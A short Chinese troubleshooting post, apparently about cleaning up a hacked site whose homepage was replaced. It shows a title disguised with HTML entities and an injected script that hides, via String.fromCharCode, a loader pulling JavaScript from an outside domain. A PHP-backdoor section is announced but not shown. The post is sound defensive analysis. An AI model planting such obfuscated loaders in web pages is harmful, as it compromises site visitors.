黑客攻击网站,篡改首页问题排查修复

1,修改首页,并植入js

标题通过unicode编码,隐藏了

<title>&#24320;&#20113;&#40;&#20013;&#22269;&#41;&#75;&#97;&#105;&#121;&#117;&#110;&#183;&#23448;

js文件通过String.fromCharCode隐藏起来了

<script type="text/javascript"> var xt = String.fromCharCode(0,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,120,106,115,56,56,50,46,99,111,109,47,121,98,46,106,115,34,62,60, 47,115, 99,114,105,112,116,62); document.write(xt);

2,加入php后门

解码后在实际攻击内容如下

相关推荐
EngZegNgi1 小时前
安卓应用启动崩溃的问题排查记录
android·crash·启动崩溃
火柴就是我2 小时前
每日见闻之Container Decoration
android·flutter
天枢破军2 小时前
【AOSP】解决repo拉取提示无法连接android.googlesource.com
android
whysqwhw2 小时前
OkHttp之AndroidPlatform类分析
android
XiaolongTu2 小时前
Kotlin Flow详述:从一个“卡顿”问题到线程切换的本质
android·面试
Kapaseker2 小时前
全网最详细的Compose Stable讲解,你一定要看
android
solo_992 小时前
使用Android Studio 聊微信
android
whysqwhw3 小时前
OkHttp PublicSuffix包的平台化设计分析
android
whysqwhw3 小时前
Conscrypt 源码分析全图解(附精要讲解)
android
一只柠檬新3 小时前
Kotlin object单例到底是懒汉式还是饿汉式
android·kotlin